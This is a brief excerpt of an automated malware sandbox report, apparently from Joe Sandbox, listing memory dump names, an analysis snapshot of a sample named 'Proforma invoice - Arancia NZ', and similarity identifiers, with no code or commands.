• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461